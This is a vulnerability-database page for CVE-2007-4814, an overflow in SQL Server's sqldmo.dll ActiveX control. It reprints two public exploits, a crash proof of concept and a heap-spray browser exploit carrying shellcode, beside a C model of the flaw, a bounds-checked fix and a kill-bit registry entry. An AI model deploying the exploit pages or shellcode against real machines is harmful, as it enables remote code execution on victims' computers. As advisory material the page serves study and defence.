CVE-2007-4814 : Detail

Category: Overflow
69.97% V3
Attack vector: Network
Published: 2007-09-11 17h00 +00:00
Last modified: 2018-10-15 18h57 +00:00

CVE Description

Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs, so the percentile is how one CVE's EPSS score is compared with the rest.

Exploit information

Exploit Database EDB-ID : 4379

Publication date : 2007-09-07 22h00 +00:00
Author : rgod
EDB Verified : Yes

<!--
18.48 01/09/2007

Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll)
remote buffer overflow poc

file version:    2000.085.2004.00
product version: 8.05.2004

passing some fuzzy chars to Start method:

EAX 00000000
ECX 00620062
EDX 00620062
EBX 1C3A3638 SQLDMO.1C3A3638
ESP 0013D87C
EBP 0013DAA8
ESI 03042544
EDI 0013DAA0 ASCII "|T"
EIP 1C1C9800 SQLDMO.1C1C9800

...
1C1C97EA  8D8D E4FDFFFF   LEA ECX,DWORD PTR SS:[EBP-21C]
1C1C97F0  51              PUSH ECX
1C1C97F1  8B95 E0FDFFFF   MOV EDX,DWORD PTR SS:[EBP-220]
1C1C97F7  8B02            MOV EAX,DWORD PTR DS:[EDX]
1C1C97F9  8B8D E0FDFFFF   MOV ECX,DWORD PTR SS:[EBP-220]
1C1C97FF  51              PUSH ECX
1C1C9800  FF90 DC010000   CALL DWORD PTR DS:[EAX+1DC]   <--- exception access violation when reading 000001DC

by manipulating edx you have the first exploitable condition...
also seh is overwritten, then:

EAX 00000000
ECX 00610061
EDX 7C9137D8 ntdll.7C9137D8
EBX 00000000
ESP 0013D4AC
EBP 0013D4CC
ESI 00000000
EDI 00000000
EIP 00610061

object safety report:
RegKey Safe for Script: False
RegKey Safe for Init:   False
Implements IObjectSafety: True

means: works according to security settings for the Internet zone
needs Activex "not marked as safe" option set to "ask" or "enabled" (not the predefined one)

rgod.
http://retrogod.altervista.org
-->
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4
'edx = ecx
edx ="bb"
seh ="aa"
StartMode =True
Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCCC\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login ="aaaaaaaa"
Password ="bbbbbbbb"
SQLServer.Start StartMode ,Server ,Login ,Password
</script>
</html>
# milw0rm.com [2007-09-08]
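The crash rgod documents has a simple shape: the long Server argument is copied into a fixed-size stack buffer, the overrun reaches a saved object pointer, and the code then reloads that pointer (MOV EDX,[EBP-220]) and calls through its vtable (MOV EAX,[EDX]; CALL [EAX+1DC]). The C below is an added model of that pattern, not sqldmo.dll's code: the buffer size, the frame layout and the "0x1000" stand-in object address are assumptions. It lays the frame out as a byte image so the demonstration itself stays memory-safe, shows the unchecked copy replacing the pointer with attacker bytes, and puts the length-checked version beside it.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the Start method's frame (assumed layout, not sqldmo's):
 * a fixed buffer that receives the Server string, followed by the saved
 * object pointer that the real code reloads from [EBP-220] after the copy
 * and dereferences for the vtable call at [EAX+1DC]. */
enum { SERVER_BUF = 32 };                 /* assumed buffer size */

struct frame {
    char      server[SERVER_BUF];         /* destination of the copy */
    uintptr_t obj;                        /* pointer reloaded after the copy */
};

/* Build the frame image with a known object pointer in place. */
static void frame_init(unsigned char *image, uintptr_t obj)
{
    memset(image, 0, sizeof(struct frame));
    memcpy(image + offsetof(struct frame, obj), &obj, sizeof obj);
}

/* "Before": copy strlen(server) bytes with no bound on SERVER_BUF.
 * Returns the object pointer value the code would reload afterwards;
 * once the input is longer than the buffer, that value is attacker data
 * and MOV EAX,[EDX] reads from wherever those bytes point. */
uintptr_t start_unchecked(const char *server, uintptr_t obj)
{
    unsigned char image[sizeof(struct frame)];
    frame_init(image, obj);

    size_t n = strlen(server);
    if (n > sizeof image)          /* cap only so this demo cannot overrun its own image */
        n = sizeof image;
    memcpy(image, server, n);      /* n > SERVER_BUF overwrites the pointer field */

    uintptr_t reloaded;
    memcpy(&reloaded, image + offsetof(struct frame, obj), sizeof reloaded);
    return reloaded;
}

/* "After": accept the string only if it fits together with its NUL terminator. */
bool start_checked(const char *server, char out[SERVER_BUF])
{
    size_t n = strlen(server);
    if (n >= SERVER_BUF)           /* >= : exactly SERVER_BUF bytes would drop the NUL */
        return false;
    memcpy(out, server, n + 1);
    return true;
}

/* Constructed sample inputs. */
const char SHORT_SERVER[] = "sqlhost";                                    /* fits */
const char EDGE_SERVER[]  = "0123456789abcdef0123456789abcdef";           /* 32 bytes: buffer full, NUL would not fit */
const char LONG_SERVER[]  = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB";   /* 40 bytes: the B's land on the pointer */
char SCRATCH[SERVER_BUF];

int main(void)
{
    const uintptr_t good = 0x1000;  /* stand-in for a valid object address */

    uintptr_t p = start_unchecked(LONG_SERVER, good);
    printf("unchecked copy of %zu bytes: object pointer = 0x%" PRIxPTR " (%s)\n",
           strlen(LONG_SERVER), p, p == good ? "intact" : "clobbered");

    printf("checked copy: short input %s, 32-byte input %s, 40-byte input %s\n",
           start_checked(SHORT_SERVER, SCRATCH) ? "accepted" : "rejected",
           start_checked(EDGE_SERVER, SCRATCH)  ? "accepted" : "rejected",
           start_checked(LONG_SERVER, SCRATCH)  ? "accepted" : "rejected");
    return 0;
}
```

In the real control the clobbered value is what ends up in EDX; rgod's "edx = ecx" note and the 00620062 register dump show the "bb" characters from the script arriving there as UTF-16. The checked version is the only fix that matters at the code level; everything else (zone settings, the kill bit) only stops the control from being reached.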
Exploit Database EDB-ID : 4398

Publication date : 2007-09-11 22h00 +00:00
Author : 96sysim
EDB Verified : Yes

<!--
+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
    code by rgod               http://www.milw0rm.com/exploits/4379
    code by Trirat Puttaraksa  http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)
-->
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>
<SCRIPT language="javascript">
// Heap Spray
// execute "calc.exe"
shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
bigblock = unescape("%u9090%u9090");              // NOP sled material
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;   // 0x40000 UTF-16 chars of NOPs per block
memory = new Array();
for (i=0;i<501;i++) memory[i] = block + shellcode;   // 501 NOP+shellcode blocks so 0x0D0D0D0D lands in a sled
</SCRIPT>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4
myseh = unescape("%u0D0D%u0D0D") ' heap spray range - possible change
' edx is never assigned in this script; VBScript concatenates the Empty value as ""
StartMode =True
Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\DDDD\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\DDDD\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login ="aaaaaaaa"
Password ="bbbbbbbb"
SQLServer.Start StartMode ,Server ,Login ,Password
</script>
</html>
# milw0rm.com [2007-09-12]
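Both exploits instantiate the control by CLSID from a web page, and rgod's object-safety report notes that it implements IObjectSafety, so it runs whenever the zone's "not marked as safe" setting is relaxed. The Windows-side control for that, independent of the DLL being patched, is the ActiveX kill bit: setting Compatibility Flags to 0x400 under the control's CLSID stops Internet Explorer from loading it in any zone (Microsoft KB 240797). The registry fragment below is an added example, not part of either exploit or of a Microsoft advisory; it uses the CLSID from the two pages, and the Wow6432Node key covers 32-bit IE on 64-bit Windows.

```reg
Windows Registry Editor Version 5.00

; Kill bit for SQLDMO.SQLServer (CLSID from the exploits above)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{10020200-E260-11CF-AE68-00AA004A34D5}]
"Compatibility Flags"=dword:00000400

; Same entry for 32-bit Internet Explorer on 64-bit Windows
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{10020200-E260-11CF-AE68-00AA004A34D5}]
"Compatibility Flags"=dword:00000400
```

The kill bit only affects instantiation through IE's ActiveX host; Enterprise Manager and other local COM clients keep using sqldmo.dll, which is why the bounds check in the DLL, not the kill bit, is the real fix.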

Products Mentioned

Configuration 0

Microsoft >> Sql_server >> Version 2005

Note: the description and both exploits reference the SQL Server 2000 and MSDE 2000 builds of sqldmo.dll (2000.085.2004.00 and 2000.80.760.0, shipped with Enterprise Manager 8.05.2004), while the CPE configuration above lists only SQL Server 2005.

References

http://securityreason.com/securityalert/3112
Tags : third-party-advisory, x_refsource_SREASON
https://www.exploit-db.com/exploits/4379
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/25594
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4398
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/38399
Tags : vdb-entry, x_refsource_OSVDB